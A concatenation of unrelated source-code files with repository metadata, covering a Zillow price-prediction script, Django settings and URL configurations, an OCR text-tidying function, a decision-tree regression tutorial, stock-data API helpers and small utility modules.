69f59e6ccebacf586ba64e2f918a26a73d3f77d8
|
[] |
no_license
|
wkirgsn/zillow-price
|
7a544d51f36d908284c6cd097d35caf0be120cbe
|
252141917f813a6f710e7ee49c72b05c68fceec9
|
refs/heads/master
| 2021-05-16T13:39:14.671670
| 2017-10-01T11:47:00
| 2017-10-01T11:47:00
| 105,437,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,850
|
py
|
import numpy as np
import pandas as pd
import xgboost as xgb
from catboost import CatBoostRegressor
import gc
print('Loading data ...')
train = pd.read_csv('data/train_2016_v2.csv', parse_dates=['transactiondate'])
prop = pd.read_csv('data/properties_2016.csv')
sample = pd.read_csv('data/sample_submission.csv')
print('Binding to lower types')
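# Downcast float64/int64 columns to 32-bit to roughly halve the memory
# footprint of the large properties frame.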
for c, dtype in zip(prop.columns, prop.dtypes):
if dtype == np.float64:
prop[c] = prop[c].astype(np.float32)
elif dtype == np.int64:
prop[c] = prop[c].astype(np.int32)
print('Creating training set ...')
df_train = train.merge(prop, how='left', on='parcelid')
cols_to_drop = ['parcelid', 'logerror', 'transactiondate', 'propertyzoningdesc',
'propertycountylandusecode']
x_train = df_train.drop(cols_to_drop, axis=1)
y_train = df_train['logerror'].values
print(x_train.shape, y_train.shape)
train_columns = x_train.columns
for c in x_train.dtypes[x_train.dtypes == object].index.values:
x_train[c] = x_train.loc[:, c].notnull()
del df_train; gc.collect()
cat = CatBoostRegressor()
cat.fit(x_train, y_train)
split = 80000
x_train, y_train, x_valid, y_valid = x_train[:split], y_train[:split], \
x_train[split:], y_train[split:]
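# The right-hand side is evaluated before assignment, so the validation slices
# are taken from the full arrays before x_train/y_train are overwritten.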
print('Building DMatrix...')
d_train = xgb.DMatrix(x_train, label=y_train)
d_valid = xgb.DMatrix(x_valid, label=y_valid)
del x_train, x_valid; gc.collect()
print('Training ...')
params = {}
params['eta'] = 0.02
params['objective'] = 'reg:linear'
params['eval_metric'] = 'mae'
params['max_depth'] = 4
params['silent'] = 1
watchlist = [(d_train, 'train'), (d_valid, 'valid')]
clf = xgb.train(params, d_train, 10000, watchlist, early_stopping_rounds=100,
verbose_eval=10)
del d_train, d_valid
print('Building test set ...')
sample['parcelid'] = sample['ParcelId']
df_test = sample.merge(prop, on='parcelid', how='left')
del prop; gc.collect()
x_test = df_test.loc[:, train_columns]
nancols = x_test.dtypes[x_test.dtypes == object].index.values.tolist()
x_test[nancols] = x_test.loc[:, nancols].notnull()
del df_test, sample; gc.collect()
p_test_cat = cat.predict(x_test)
d_test = xgb.DMatrix(x_test)
del x_test; gc.collect()
print('Predicting on test ...')
p_test = clf.predict(d_test)
del d_test; gc.collect()
sub = pd.read_csv('data/sample_submission.csv')
for c in sub.columns[sub.columns != 'ParcelId']:
sub[c] = p_test_cat
print('Writing csv ...')
sub.to_csv('out/xgb_starter_compressed_cat.csv.gz', index=False,
float_format='%.4g',
compression='gzip')
print('ensemble..')
for c in sub.columns[sub.columns != 'ParcelId']:
sub[c] = (p_test_cat + p_test)/2
print('Writing csv ...')
sub.to_csv('out/xgb_starter_compressed_catxgb_mean.csv.gz', index=False,
float_format='%.4g',
compression='gzip')
|
[
"wilhelmk@mail.uni-paderborn.de"
] |
wilhelmk@mail.uni-paderborn.de
|
9544841fc293907e211e29dc992b4419391f68dc
|
5a95f6c93b33395dbe8196272ceeeb5db8807595
|
/goods/goods/wsgi.py
|
edce0dd24217a5e012955ac06bff9f2b28ea6b07
|
[] |
no_license
|
endlessmeal/simbirsoft_services
|
c69070a48fbcbc7f22b5adb117d7a5572a3fa6bf
|
7d04bec672981d137343deb23571b0ad88ece0e5
|
refs/heads/master
| 2022-12-07T05:33:11.685829
| 2020-09-06T14:00:03
| 2020-09-06T14:00:03
| 278,183,758
| 0
| 0
| null | 2020-09-06T14:00:06
| 2020-07-08T20:05:01
|
Python
|
UTF-8
|
Python
| false
| false
| 387
|
py
|
"""
WSGI config for goods project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "goods.settings")
application = get_wsgi_application()
|
[
"baloyan99@list.ru"
] |
baloyan99@list.ru
|
c61b485be71d37e1c1aa04dbb57dde30e36caab9
|
8cd76a2218bdadb6126ea176c2840daf27f2b146
|
/pycode_hub/012_tidy_content.py
|
caae2be5f4decb41b07adf2652bcfaa4b7709426
|
[] |
no_license
|
hee0624/pycode
|
bf27b4c3eda2cb4f0031f7b38c26abbdc049b532
|
d19c0fb28d1eb0b655347b5ca4b00cc84521ba94
|
refs/heads/main
| 2023-04-19T12:04:33.433896
| 2021-04-29T09:05:43
| 2021-04-29T09:05:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,212
|
py
|
# coding:utf-8
"""
@desc: Clean up OCR output and reassemble it into complete semantic paragraphs
@author: chenhe
@create: Wed, 19 Dec 2018, 09:24:52 CST
"""
import re
import jieba
def tidy_content(ori_content, line_num=24):
"""
    Clean up OCR output and reassemble it into complete semantic paragraphs.
    :param ori_content: the content to tidy, as a string
    :return fmt_content: the formatted result, as a string
"""
lines_blank = []
lines_title = []
lines_merge = []
lines_res = []
word_dic = set()
with open('dict.txt') as fp:
for line in fp:
if line.strip():
word = line.split(' ')[0]
word_dic.add(word)
lines = ori_content.split('\n')
tmp = []
lines.insert(0, '')
lines.insert(1, '')
    # Re-join heading numbers that were split onto their own line
for ix, line in enumerate(lines):
line = line.strip()
if re.match('\s*[\((]?\s*[0-9一二三四五六七八九十]+[\))]?\s*[、::]?$', line):
print(line)
tmp.append(line)
else:
if tmp:
tmp.append(line)
bind_line = ''.join(tmp)
bind_line = bind_line.replace('\n', '')
lines_title.append(bind_line)
tmp.clear()
else:
lines_title.append(line)
    # When a sub-heading is encountered, insert blank lines around it
for ix, line in enumerate(lines_title):
line = line.strip()
if re.match('\s*\d+\s*\.', line):
lines_blank.append('')
lines_blank.append(line)
elif re.match('\s*[\((]\s*[\d\w]+\s*[\))]', line):
lines_blank.append('')
lines_blank.append(line)
elif re.match('\w{2,7}\s*[::]', line):
lines_blank.append('')
lines_blank.append(line)
elif re.match('^.*?[::]$', line):
lines_blank.append(line)
lines_blank.append('')
else:
try:
front_line = lines[ix-1]
if re.match('^(.*?[。?!]\s*)$', front_line):
lines_blank.append('')
lines_blank.append(line)
else:
lines_blank.append(line)
except IndexError:
lines_blank.append(line)
    # Merge consecutive lines into paragraphs
tmp = []
for line in lines_blank:
num = len(line)
if num >= line_num and not tmp:
tmp.append(line)
elif num <= line_num and tmp:
tmp.append(line)
lines_merge.append(''.join(tmp))
tmp.clear()
elif num >= line_num and tmp:
tmp.append(line)
else:
lines_merge.append(line)
else:
if tmp:
lines_merge.append(''.join(tmp))
    # Handle the case where the end of one line and the start of the next form a single word
try:
end_word = list(jieba.cut(lines_merge[0]))[-1]
lines_res.append(lines_merge[0])
except IndexError:
end_word = ''
lines_res.append('')
for line in lines_merge[1:]:
tmp = end_word
seg_list = list(jieba.cut(line))
if seg_list:
first_word = seg_list[0]
end_word = seg_list[-1]
word = tmp + first_word
if tmp in [',', ',', ';']:
last_line = lines_res.pop()
bind_line = last_line + line
lines_res.append(bind_line.replace('\n', ''))
elif len(first_word) == 1 and (word in word_dic):
last_line = lines_res.pop()
bind_line = last_line + line
lines_res.append(bind_line.replace('\n', ''))
else:
lines_res.append(line)
else:
lines_res.append(line)
fmt_lst = []
for ix, line in enumerate(lines_res):
if line.strip():
fmt_lst.append(line)
print(ix, line)
fmt_content = '\n'.join(fmt_lst)
return fmt_content
if __name__ == '__main__':
text = """
信用卡中心财务管理委员会通知书
客户服务部:
经信用卡中心财务管理委员会二O一七年第二十四次会议(2017年
12月01日)表决通过贵部门以下议题:
议题:客户服务部关于建设外交部全球领事保护与服务应急呼叫中
心手机APP的请示(2014年,信用卡中心代装民生银行代维代建了“外
交部全球领事保护与服务应急呼叫中心”(简称“呼叫中心”),并于当年
3月2日正式运营,面向全球华人开放。根据形势发展需要,外交部拟
将借力信息技术和新媒体传播优势,外交部在2016年的招标文件中要求
新建基于APP的多媒体服务求助平台,实现与呼叫中心系统的无缝对接,
并计划在2017年推出12308手机APP,在提供高质量政府服务的同时,
追求与移动互联网发展节奏-一致的高质量用户体验。计划于2018年1月
31曰前完成系统上线。
经卡中心科技管理部评估,此项目费用共约148.8万元。费用具体
明细如下:
贵别预算跳用工 贷源配登方式
佻应谢
硬件:
251元科技标准产 品
"""
# with open('result.txt', 'r') as fp:
# text = fp.read()
print(tidy_content(ori_content=text))
|
[
"chenhe@datahorizon.cn"
] |
chenhe@datahorizon.cn
|
bad3c8290c03c546ca8cb00e740e87e0c82af504
|
543a414c879b62484a6837a1d8dbcf736cc486da
|
/mymod.py
|
b0cdcdfc01877dfa29e2dc195ddefe2d1d1dc470
|
[] |
no_license
|
hanochk/myRepo
|
d8a94a459f200625889473df998e4e7e2c569bf8
|
a1138b0fbf0763d31255a5292dd79752ff589161
|
refs/heads/master
| 2021-07-15T10:50:07.874648
| 2021-02-18T12:54:02
| 2021-02-18T12:54:02
| 97,365,481
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 336
|
py
|
# mymod.py
"""Python module demonstrates passing MATLAB types to Python functions"""
def search(words):
"""Return list of words containing 'son'"""
newlist = [w for w in words if 'son' in w]
return newlist
def theend(words):
"""Append 'The End' to list of words"""
words.append('The End')
return words
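# A minimal usage sketch (the sample words are assumed, not from the original demo):
if __name__ == '__main__':
    names = ['Jones', 'Peterson', 'Adams']
    print(search(names))   # -> ['Peterson']
    print(theend(names))   # -> ['Jones', 'Peterson', 'Adams', 'The End']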
|
[
"noreply@github.com"
] |
hanochk.noreply@github.com
|
362a23564914b6d36a4e32aacc9ab9590bbc7c70
|
3beb93caec1a26a9e058dc1b60d61e57bdaa56cd
|
/upgrades/surveyor.py
|
c965341eb5a7224fdae0f639c2cac59752ba4bd9
|
[] |
no_license
|
dudisgit/REMOTE-python-game
|
0c91db596ac6e044409065166c6dc0b95264539d
|
c5462900e0b78a3e1a0eecdc684fe6735207355c
|
refs/heads/master
| 2021-01-25T08:19:36.204298
| 2018-05-10T20:01:36
| 2018-05-10T20:01:36
| 93,753,147
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
import upgrades.base as base
class Main(base.Main):
def __init__(self,LINK,ID=-1):
self.init(LINK)
self.ID = ID
self.name = "surveyor"
self.displayName = "Surveyor" #Name of the upgrade (displayed)
self.droneUpgrade = False
self.damage = 0 #Damage to the upgrade.
self.used = True
def loop(self,lag): #Loop ran single player or server side
if not self.damage==2 and self.ID!=-1:
self.LINK["showRooms"] = True
|
[
"dudethisbotguyisedgy@gmail.com"
] |
dudethisbotguyisedgy@gmail.com
|
669da776948e077624f44e22fdecf2816689f56c
|
a9ae4498a248f39c229d2eb1f10c401b3127bb6a
|
/decision_tree_regression.py
|
de740b023190c9581a48ba94f1ac2d10cdc646ef
|
[] |
no_license
|
samariotorres/projects
|
64a6a32ed51a48082ba18b253efd91604e0465c1
|
4d8f6ffc4a3ccd72bb435af7bc74f8b59e7209e5
|
refs/heads/master
| 2020-04-14T14:17:52.249734
| 2019-01-22T04:05:13
| 2019-01-22T04:05:13
| 163,892,495
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,952
|
py
|
# Decision Tree REGRESSION (Decision Tree CLASSIFICATION found in decision_tree_classification.py)
# -----------------------------------Decision Tree Intuition------------------------------------------
#Example) Consider a scatter plot that represents some dataset with two independent variables x_1 and x_2
# predicting the third variable y (where y is the third dimension). We do not need to be able to visualize y at first.
# We can begin by building our decision tree using the scatter plot, then after we build it, return to y.
# Once we run the decision tree regression algorithm, the scatter plot will be split up into segments; how and where
# the splits are conducted is determined by the algorithm (by mathematical information entropy....complex)
# Boiled down: when the algorithm performs a split, it's asking whether the split increases the amount of information we have
# about our points. Are the splits adding value? How do we want to group our points?
# The algorithm knows when to stop when there is a certain minimum for the information that needs to be added, and once
# it cannot add any more information (it's reached the minimum), it stops SPLITTING the LEAVES (each split is called
# a leaf). For example, a decision tree regression would stop if the following event occurred: if, when we conducted a split,
# the resulting leaf would have less than 5% of the total scattered points, then that leaf wouldn't be created.
# Final leaves are called TERMINAL leaves.
# By adding these leaves, we've added information into our system. How does that help us predict the value of y?
# You just take the averages of each of the terminal leaves; you take the average of the y-values for all of the
# points in a particular leaf, and that's your y_pred, which is assigned to any new data point in that leaf and is done
# so using a decision tree, hence the name. :)
#
#Information entropy is the average rate at which information is produced
#by a stochastic source of data. The measure of information entropy associated
#with each possible data value is the negative logarithm of the probability
#mass function for the value...see wikipedia
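# Worked mini-example (illustrative numbers, not from this dataset): if a
# terminal leaf ends up containing points with y-values 45000, 50000 and 55000,
# every new observation that falls into that leaf is predicted as their mean,
# (45000 + 50000 + 55000) / 3 = 50000.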
# Importing the libraries
import numpy as np #import standard data libraries
import matplotlib.pyplot as plt #import matplotlib.pylot as plt
import pandas as pd #import pandas as pd
# Importing the dataset make sure the current directory is switched
dataset = pd.read_csv('Position_Salaries.csv')
X = dataset.iloc[:, 1:2].values
y = dataset.iloc[:, 2:].values
# Splitting the dataset into the Training set and Test set
"""from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)"""
# Feature Scaling
"""from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)"""
# Fitting Decision Tree Regression to the dataset
#Creating our decision tree regressor
from sklearn.tree import DecisionTreeRegressor #importing DecisionTreeRegressor class from sklearn.tree
regressor = DecisionTreeRegressor(random_state = 0) #creating our DecisionTreeRegressor object called regressor
# default criterion = mse or mean squared error (so we are taking the squared difference between the prediction
# and the actual result, and then taking the sum of those distances to measure the error. very good and common criterion)
# then you have some other parameters like splitter and max_features which is for a more advanced approach of how
# to build the decision tree. (there's a lot of parameters you can choose)
# we let the random state = 0 so that we all get the same result..for example purposes
regressor.fit(X, y) #final step is to FIT the regressor object to our dataset
#regressor.fitMethod(X our matrix of features, y our dependent variable vector)
# Predicting a new result
y_pred = regressor.predict([[6.5]])  # predict expects a 2D array of samples
#Now saving the best part for last...the regression results VISUALIZED
#It should have the appearance of a piecewise function...model is non-continuous
#the value for a prediction should be a constant average for each prediction on each interval
# Visualising the Decision Tree Regression results (higher resolution)
X_grid = np.arange(min(X), max(X), 0.01) #you need to do this so that we get a higher resolution picture
X_grid = X_grid.reshape((len(X_grid), 1)) # if you graph using basic technique, you'll get something that looks like
plt.scatter(X, y, color = 'red') # a linear regression model...so we "PLOT" more points
plt.plot(X_grid, regressor.predict(X_grid), color = 'blue')
plt.title('Truth or Bluff (Decision Tree Regression)')
plt.xlabel('Position level')
plt.ylabel('Salary')
plt.show()
#As you can see, the decision tree regression model is predicting the average
#Check out random forest next. They're pretty much a team of decision trees! :)
|
[
"noreply@github.com"
] |
samariotorres.noreply@github.com
|
832ff4fb7f956ba71e8669aad94428fc4e8bc4ef
|
917670aa0657612aea5f677c3d9b4ca07acce36f
|
/period.py
|
020ff36fe8f02baed3e00162d6ceb6a0caac1edf
|
[
"MIT"
] |
permissive
|
Necrophote/demotvcrawl
|
7451b69690b8fba91d205dd1ce04494411e623d0
|
21b10d377e9bc51c6410336efff257a31d8ac3a1
|
refs/heads/main
| 2023-01-20T20:47:29.935251
| 2020-11-29T16:21:04
| 2020-11-29T16:21:04
| 303,712,352
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
import os
import time, threading
def foo():
os.system("start crawl.bat")
print(time.ctime())
threading.Timer(3600, foo).start()
foo()
|
[
"noreply@github.com"
] |
Necrophote.noreply@github.com
|
1b15671ce7700da10174ab0bd1ec8dc68a157fe8
|
04edf551ccc291421e21d2fe1dd88a3daf3aa5b6
|
/espiga/settings.py
|
335fa36d0ece88164cee3d5e3a0cac4bfc7f6929
|
[] |
no_license
|
warleysystem/sistema_espiga
|
7c559f68600d8820c635df85d932a739ada9b8f4
|
619164b667169a6fa066c5bce4d89847e1a2db51
|
refs/heads/master
| 2021-01-15T22:58:21.357538
| 2011-04-07T11:38:23
| 2011-04-07T11:38:23
| 1,581,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,629
|
py
|
# Django settings for espiga project.
import os, platform
PROJECT_ROOT_PATH = os.path.dirname(os.path.abspath(__file__))
MEDIA_ROOT_PATH = PROJECT_ROOT_PATH
MEDIA_ROOT_URL = '/espiga/'
MEDIA_ROOT_URL_ADMIN = '/'
LOCAL = True
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'postgresql_psycopg2', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'espiga', # Or path to database file if using sqlite3.
'USER': 'postgres', # Not used with sqlite3.
'PASSWORD': 'postgres', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '5432', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Araguaina'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'pt-br'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(MEDIA_ROOT_PATH, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = MEDIA_ROOT_URL + 'media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = MEDIA_ROOT_URL + 'media/admin_media1.3/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'ru_ld)yn6c!v-$1#)dhr2_$x)r$+9=gxxm-zxsmmuft2l3dvfr'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
AUTH_PROFILE_MODULE = 'espiga.perfilinicial'
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
os.path.join(PROJECT_ROOT_PATH, 'templates'),
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'noticia',
'bancoimagem',
#'arquivo',
'enquete',
'perfilinicial',
'video',
'upload',
'servico',
'publicidade',
'configuracoes',
'link',
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
[
"flaviohcf@gmail.com"
] |
flaviohcf@gmail.com
|
812fc692d35e71f7c0b0eada335f86fefac1c3e0
|
4668b5e3d5dc1e4b6e6d8b0a0f698f1d338a013b
|
/practice/InterFacePractice/BiaoYang.py
|
aaa2d34d52dc9ec4df814dc19de93ac311b6d508
|
[] |
no_license
|
Hardworking-tester/HuaYingAPP
|
d0ac9b915fc22501577b9e5e6e2d0ec772b32af8
|
8cf74adbc1db62fe27bb8d75adccae25eef49389
|
refs/heads/master
| 2021-01-24T06:40:22.469601
| 2017-06-02T13:24:59
| 2017-06-02T13:24:59
| 42,506,840
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,410
|
py
|
# encoding:utf-8
import urllib
import urllib2
import httplib
class Tt1():
    # Submit a commendation (praise)
def biaoYang(self):
web_url='http://192.168.1.241:8080/zhsq/client/owner_repair!save.action'
values = {'token':'6m3ou41429594424828','stewardId':'402881714e0a715e014e0a7479600000,402881714e0a715e014e0a9943bf000b,402881714e0a715e014e0a99cb63000c,402881714e0a715e014e0a751d910001,402881714e0a715e014e0a77ed6a0002,402881714e0a715e014e0a7a333d0003,402881ea4e09af57014e09b2651f0000','ownerRepair.owner.id':'402881714dc2e54c014dd0c979a90002',
'ownerRepair.member.id':'4028813c4cda5ee7014cda77c5fc0001','ownerRepair.ownerName':'王伟高',
'ownerRepair.OwnerPhone':'15093492821','ownerRepair.ownerAddr':'宏江中央广场','ownerRepair.imageContent':'','ownerRepair.repairDescribe':'保安、保洁等物业管理人员都很负责任2222','ownerRepair.useFlag':5}
data1=urllib.urlencode(values)
req=urllib2.Request(web_url,data1)
rep=urllib2.urlopen(req)
paga=rep.read()
print paga
    # View commendations
def chaKanBiaoYang(self):
# web_url='http://192.168.1.241:8080/zhsq/client/owner_repair!listByProcessFlag.action'
web_url='http://192.168.1.241:9080/zhsqitfe/client/owner_repair!listByProcessFlag.action'
values = {'token':'6m3ou41429594424828','ownerRepair.owner.id':'402881714dc2e54c014dd0c979a90002','ownerRepair.useFlag':5,'ownerRepair.processFlag':0,'pager.pageNumber':1,'pager.pageSize':'','pager.orderBy':'','pager.order':''}
# values = {'token':'6m3ou41429594424828','ownerRepair.owner.id':'402881714dc2e54c014dd0c979a90002','ownerRepair.useFlag':5,'ownerRepair.processFlag':0,'pager.pageNumber':'','pager.pageSize':1,'pager.orderBy':'','pager.order':''}
data1=urllib.urlencode(values)
req=urllib2.Request(web_url,data1)
rep=urllib2.urlopen(req)
paga=rep.read()
print paga
    # Get the list of property-management roles
def getWuYeJueSeList(self):
web_url='http://192.168.1.241:9080/zhsqitfe/client/owner_repair!getStewardListByMember.action'
values = {'token':'6m3ou41429594424828','steward.roleType':100}
data1=urllib.urlencode(values)
req=urllib2.Request(web_url,data1)
rep=urllib2.urlopen(req)
paga=rep.read()
print paga
pp=Tt1()
# pp.biaoYang()
pp.chaKanBiaoYang()
# pp.getWuYeJueSeList()
|
[
"373391120@qq.com"
] |
373391120@qq.com
|
fc02747ee5fad59c76ecb639e240238121325320
|
77a543ef8b3501c152dfa18fab3f3c14b21f2a1d
|
/sanscom/utils/urls.py
|
2a9c6be520d480b38409af6ef4122dbbd2790d48
|
[
"BSD-3-Clause"
] |
permissive
|
ouhouhsami/django-sanscom
|
c483d3461ca51684894e41045f2849814e91cf3e
|
38f4837795bdaf8d7151241e9c03f934ec25efed
|
refs/heads/master
| 2020-04-05T23:26:30.568324
| 2013-09-09T20:10:26
| 2013-09-09T20:10:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,938
|
py
|
#-*- coding: utf-8 -*-
from django.conf.urls import patterns, url
from geoads.views import (AdDetailView, AdSearchDeleteView,
AdSearchUpdateView, AdCreateView, CompleteView,
AdPotentialBuyersView, AdPotentialBuyerContactView)
from geoads.contrib.moderation.views import ModeratedAdUpdateView
from sanscom.utils.views import CustomAdDeleteView
from sanscom.utils.forms import PrettyAdPictureForm, HomeContactForm, CustomAdSearchUpdateForm
def ads_urlpatterns(AdModel, AdSearchModel, AdSearchResultModel, AdForm, AdSearchView):
urlpatterns = patterns('',
url(r'^(?P<slug>[-\w]+)$', AdDetailView.as_view(model=AdModel, contact_form=HomeContactForm), name="view"),
url(r'^search/$', AdSearchView.as_view(model=AdModel), name='search'),
url(r'^search/(?P<search_id>\d+)/$', AdSearchView.as_view(), name='search'),
url(r'^delete_search/(?P<pk>\d+)$', AdSearchDeleteView.as_view(model=AdSearchModel), name='delete_search'),
url(r'^edit_search/(?P<pk>\d+)$', AdSearchUpdateView.as_view(model=AdSearchModel, form_class=CustomAdSearchUpdateForm), name="update_search"),
url(r'^add/$', AdCreateView.as_view(model=AdModel, form_class=AdForm, ad_picture_form=PrettyAdPictureForm), name='add'),
url(r'^add/complete/$', CompleteView.as_view(), name='complete'),
url(r'^(?P<pk>\d+)/edit$', ModeratedAdUpdateView.as_view(model=AdModel, form_class=AdForm, ad_picture_form=PrettyAdPictureForm), name='edit'),
url(r'^(?P<pk>\d+)/delete$', CustomAdDeleteView.as_view(model=AdModel), name='delete'),
url(r'^contact_buyers/(?P<pk>\d+)$', AdPotentialBuyersView.as_view(model=AdModel, search_model=AdSearchResultModel), name="contact_buyers"),
url(r'^contact_buyer/(?P<adsearchresult_id>\d+)$', AdPotentialBuyerContactView.as_view(model_class=AdSearchResultModel), name="contact_buyer"),
)
return urlpatterns
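# A minimal usage sketch (the Home* names are assumptions, not from this
# module): an app's urls.py would typically build its patterns with
#
#     urlpatterns = ads_urlpatterns(HomeAd, HomeAdSearch, HomeAdSearchResult,
#                                   HomeAdForm, HomeAdSearchView)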
|
[
"samuel.goldszmidt@gmail.com"
] |
samuel.goldszmidt@gmail.com
|
c7d1c021adb9a0479f9a0c56b4f62e21fcf449c7
|
9dbd877adf6d89583b83a5769a63af627f5b1130
|
/download_stocks.py
|
95c76acf3d3cf57ffc43b960a5d8f7717b9b1289
|
[] |
no_license
|
jachang820/stock-patterns
|
5c8a07230a17f4c1f3674c17608125bc0d4ded17
|
1796d67f5e5b4f3b4a3923e7fe569dd7cacefd82
|
refs/heads/master
| 2022-12-08T16:03:57.147154
| 2020-08-27T05:51:15
| 2020-08-27T05:51:15
| 290,448,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
import urllib.request, json
from datetime import date
from variables import hidden_variables
query = "https://www.alphavantage.co/query"
api_key = hidden_variables['AV_KEY']
def _download_data_from_api(url):
    with urllib.request.urlopen(url) as response:
        data = json.loads(response.read().decode())
return data
def _get_output_size(symbol, last_updated):
    if (date.today() - last_updated).days < 100:
output_size = "compact"
else:
output_size = "full"
return output_size
def download_time_series(symbol, last_updated):
function = "TIME_SERIES_DAILY_ADJUSTED"
output_size = _get_output_size(symbol, last_updated)
url = "{0}?function={1}&symbol={2}&outputsize={3}&apikey={4}".format(
query, function, symbol, output_size, api_key)
return _download_data_from_api(url)
def download_fx_series(from_symbol, to_symbol, last_updated):
function = "FX_DAILY"
output_size = _get_output_size("{0}-{1}".format(from_symbol, to_symbol), last_updated)
url = "{0}?function={1}&from_symbol={2}&to_symbol={3}&outputsize={4}&apikey={5}".format(
query, function, from_symbol, to_symbol, output_size, api_key)
return _download_data_from_api(url)
def _download_fundamentals(symbol, function):
url = "{0}?function={1}&symbol={2}&apikey={3}".format(
query, function, symbol, api_key)
return _download_data_from_api(url)
def download_company_overview(symbol):
function = "OVERVIEW"
return _download_fundamentals(symbol, function)
def download_income_statement(symbol):
function = "INCOME_STATEMENT"
return _download_fundamentals(symbol, function)
def download_balance_sheet(symbol):
function = "BALANCE_SHEET"
return _download_fundamentals(symbol, function)
def download_cash_flow(symbol):
function = "CASH_FLOW"
return _download_fundamentals(symbol, function)
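# A minimal usage sketch (the symbol and date below are assumptions, not from
# the original script):
#
#     from datetime import date
#     series = download_time_series("IBM", last_updated=date(2020, 1, 1))
#     overview = download_company_overview("IBM")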
|
[
"j.a.chang820@gmail.com"
] |
j.a.chang820@gmail.com
|
0be1345d423841c47b788d0c3e2db0cca56488f8
|
30cffb7452220c2ac2961dd2e0f42e3b359a59c0
|
/simscale_sdk/models/inside_region_refinement_with_length.py
|
d640c7685de5b48d25996222389744f8de715d77
|
[
"MIT"
] |
permissive
|
vpurcarea/simscale-python-sdk
|
0bf892d8824f8d4599caa0f345d5ba28e038f5eb
|
6f2d12b2d21142bd854042c0fb402c2c797629e4
|
refs/heads/master
| 2023-03-14T04:31:06.226337
| 2021-03-03T16:20:01
| 2021-03-03T16:20:01
| null | 0
| 0
